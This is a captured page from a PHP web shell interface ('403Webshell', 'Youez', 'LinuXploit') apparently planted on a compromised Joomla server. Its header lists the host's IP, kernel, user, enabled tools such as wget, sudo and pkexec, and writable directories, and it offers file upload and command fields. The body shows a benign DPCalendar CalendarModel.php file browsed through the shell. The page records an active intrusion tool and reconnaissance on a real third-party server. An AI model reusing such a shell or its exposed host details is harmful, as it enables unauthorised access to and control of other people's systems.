403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.197.208
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcs/administrator/components/com_dpcalendar/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fcs/administrator/components/com_dpcalendar/src/Model/CalendarModel.php
<?php
/**
 * @package   DPCalendar
 * @copyright Copyright (C) 2024 Digital Peak GmbH. <https://www.digital-peak.com>
 * @license   https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
 */

namespace DigitalPeak\Component\DPCalendar\Administrator\Model;

\defined('_JEXEC') or die();

use DigitalPeak\Component\DPCalendar\Administrator\Calendar\CalendarInterface;
use DigitalPeak\Component\DPCalendar\Administrator\Calendar\InternalCalendar;
use Joomla\CMS\Factory;
use Joomla\CMS\MVC\Model\BaseDatabaseModel;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\Registry\Registry;

class CalendarModel extends BaseDatabaseModel
{
	private static array $calendars = [];

	public function getCalendar(mixed $id): ?CalendarInterface
	{
		if (isset(self::$calendars[$id])) {
			return self::$calendars[$id];
		}

		$calendar = null;
		if (is_numeric($id) || $id == 'root') {
			$calendarNode = $this->bootComponent('dpcalendar')->getCategory()->get($id);
			if ($calendarNode == null) {
				return null;
			}

			$calendar = new InternalCalendar($calendarNode, $this->getCurrentUser());
		} else {
			PluginHelper::importPlugin('dpcalendar');
			$tmp = Factory::getApplication()->triggerEvent('onCalendarsFetch', [$id]);
			if (!empty($tmp)) {
				foreach ($tmp as $calendars) {
					foreach ($calendars as $fetchedCalendar) {
						$calendar = $fetchedCalendar;
					}
				}
			}
		}

		self::$calendars[$id] = $calendar;

		return $calendar;
	}

	public function increaseEtag(string $calendarId): void
	{
		// If we are not a native calendar do nothing
		if (!is_numeric($calendarId)) {
			return;
		}

		$calendar = self::getCalendar($calendarId);
		if (!$calendar instanceof CalendarInterface || ($calendar->getId() === '' || $calendar->getId() === '0')) {
			return;
		}

		$params = new Registry($calendar->getParams());
		$params->set('etag', $params->get('etag', 1) + 1);

		$db = $this->getDatabase();
		$db->setQuery('update #__categories set params = ' . $db->quote($params->toString()) . ' where id = ' . $db->quote($calendar->getId()));
		$db->execute();
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit